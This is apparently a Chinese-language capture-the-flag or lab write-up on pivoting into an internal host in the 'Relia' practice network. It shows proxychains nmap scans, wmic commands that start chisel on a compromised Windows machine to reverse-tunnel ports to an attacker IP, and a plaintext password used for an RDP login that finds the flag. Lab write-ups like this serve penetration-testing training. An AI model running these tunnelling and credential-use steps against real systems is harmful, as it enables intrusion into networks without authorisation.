Challenge 2 - Relia(8)
Challenge 2 - Relia(8) 下一台選定內網的機器 .8 來進行下一步的目標 上一章已經在 .191 搭建了 chisel,直接透過 socks 掃描 172.16.xxx.7 TOP 100 Port 指令,└─$ proxychains4 -q nmap -vvv -sT --top-ports=100 -Pn 172.16.172.7 可以看到有開啟 80 Port HTTP nmap 掃描 80 Port 詳細資訊看看,發現是 WordPress 6.0.3 └─$ proxychains4 -q nmap -sCV -p 80 172.16.172.7 | tee nmap-80 再起一個 chisel 8090 Server,然後透過 .191 搭建 kali 8888 對應到 172.16.xxx.7 80 Port wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8090 R:8888:172.16.172.7:80" 開啟來看看 8888 /,看來伺服器轉址有寫死 80 Port 改搭建回 kali 80 Port,wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8081 R:80:172.16.172.7:80" 再開一次 80 / 這一次有畫面了 點選相關連結發現有寫死 SNI "intranet.relia.com" 寫死 hosts 後可以正常開啟了 測試了幾組帳號密碼都沒有發現 後續測試 crackmapexec 發現 michelle@relia.com:NotMyPassword0k? 憑證有效 且 RDP 直接顯示 "Pwn3d!" RDP 測試登入,└─$ proxychains4 -q xfreerdp /u:'relia.com\michelle' /p:'NotMyPassword0k?' /v:172.16.172.7,直接進去了,桌面上直接放著 local.txt flag...